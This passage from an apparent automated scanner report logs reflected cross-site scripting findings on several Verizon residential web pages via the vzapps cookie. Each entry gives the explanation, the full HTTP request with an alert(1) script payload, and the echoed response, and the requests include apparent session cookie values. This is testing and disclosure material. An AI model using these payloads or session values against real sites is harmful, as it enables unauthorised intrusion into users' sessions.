Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXa71c4<script>alert(1)</script>f2b03f92e3a; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 201282
Expires: Sat, 20 Nov 2010 02:16:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:16:19 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:16:19 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:16:19 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:16:19 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:16:19 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXA71C4<SCRIPT>ALERT(1)</SCRIPT>F2B03F92E3A </DIV>
...[SNIP]...

1.115. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 41c30'><script>alert(1)</script>22f967e102e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX41c30'><script>alert(1)</script>22f967e102e; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 202319
Expires: Sat, 20 Nov 2010 02:16:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:16:07 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:16:07 GMT; path=/
Set-Cookie: ContextInfo_State=TX41c30'><script>alert(1)</script>22f967e102e; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:16:07 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:16:07 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:16:07 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX41C30'><SCRIPT>ALERT(1)</SCRIPT>22F967E102E ' />
...[SNIP]...

1.116. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 810dd<script>alert(1)</script>103ffbb5601 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX810dd<script>alert(1)</script>103ffbb5601; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 202315
Expires: Sat, 20 Nov 2010 02:16:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:16:08 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:16:08 GMT; path=/
Set-Cookie: ContextInfo_State=TX810dd<script>alert(1)</script>103ffbb5601; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:16:08 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:16:08 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:16:08 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX810DD<SCRIPT>ALERT(1)</SCRIPT>103FFBB5601 </DIV>
...[SNIP]...

1.117. http://www22.verizon.com/Residential/Internet/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Internet/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 247ad<script>alert(1)</script>676d79a7f4b was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Internet/ HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; V347=0; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; VZGEO=west; vzAppID=; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; lob=dotcom; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vzapps=STATE=TX247ad<script>alert(1)</script>676d79a7f4b; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/aboutFiOS/Overview.htm; CP=null*; ContextInfo_State=TX; ContextInfo_LoopQual=

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71521
Expires: Sat, 20 Nov 2010 01:42:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:42:11 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX247ad<script>alert(1)</script>676d79a7f4b; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:47:11 GMT; path=/residential/; domain=verizon.com

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Internet
</title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX247AD<SCRIPT>ALERT(1)</SCRIPT>676D79A7F4B </DIV>
...[SNIP]...

1.118. http://www22.verizon.com/Residential/Internet/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Internet/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f4434'><script>alert(1)</script>79fd05cf08e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Internet/ HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; V347=0; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; VZGEO=west; vzAppID=; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; lob=dotcom; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vzapps=STATE=TXf4434'><script>alert(1)</script>79fd05cf08e; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/aboutFiOS/Overview.htm; CP=null*; ContextInfo_State=TX; ContextInfo_LoopQual=

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73120
Expires: Sat, 20 Nov 2010 01:42:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:42:09 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXf4434'><script>alert(1)</script>79fd05cf08e; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:47:09 GMT; path=/residential/; domain=verizon.com

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Internet
</title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF4434'><SCRIPT>ALERT(1)</SCRIPT>79FD05CF08E ' />
...[SNIP]...

1.119. http://www22.verizon.com/Residential/Services/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Services/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 208b9'><script>alert(1)</script>39b64fb4a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX208b9'><script>alert(1)</script>39b64fb4a; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 53830
Expires: Sat, 20 Nov 2010 02:34:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:34:46 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX208b9'><script>alert(1)</script>39b64fb4a; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Internet | Essential Services
</title><meta name="keyword" content="verizon internet security, online backup, online sharing, file sharing
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX208B9'><SCRIPT>ALERT(1)</SCRIPT>39B64FB4A ' />
...[SNIP]...

1.120. http://www22.verizon.com/Residential/Services/BackupandSharing/BackupandSharing.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Services/BackupandSharing/BackupandSharing.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dddd6'><script>alert(1)</script>fce9bb930d7 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/BackupandSharing/BackupandSharing.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXdddd6'><script>alert(1)</script>fce9bb930d7; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 60756
Expires: Sat, 20 Nov 2010 02:35:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:35:32 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXdddd6'><script>alert(1)</script>fce9bb930d7; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Essential Services: Backup and Sharing
</title><meta name="keywords" content="back up pc, backup pc, pc backup, back up Mac, back up Macin
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXDDDD6'><SCRIPT>ALERT(1)</SCRIPT>FCE9BB930D7 ' />
...[SNIP]...

1.121. http://www22.verizon.com/Residential/Services/SecuritySuite/SecuritySuite.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Services/SecuritySuite/SecuritySuite.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bdc0d'><script>alert(1)</script>5d0b62a7dc8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/SecuritySuite/SecuritySuite.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXbdc0d'><script>alert(1)</script>5d0b62a7dc8; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64650
Expires: Sat, 20 Nov 2010 02:35:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:35:01 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXbdc0d'><script>alert(1)</script>5d0b62a7dc8; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Essential Services: Internet Security Suite
</title><meta name="keywords" description="anti-virus, firewall, anti-spyware, internet parent
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXBDC0D'><SCRIPT>ALERT(1)</SCRIPT>5D0B62A7DC8 ' />
...[SNIP]...

1.122. http://www22.verizon.com/Residential/Services/TechnicalSupport/TechnicalSupport.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Services/TechnicalSupport/TechnicalSupport.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b489b'><script>alert(1)</script>7fb57ec750f was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/TechnicalSupport/TechnicalSupport.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXb489b'><script>alert(1)</script>7fb57ec750f; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 60724
Expires: Sat, 20 Nov 2010 02:35:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:35:14 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXb489b'><script>alert(1)</script>7fb57ec750f; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Essential Services: Expert Care
</title><meta name="keywords" content="computer support, tech support, pc support, computer services, comp
...[SNIP]...
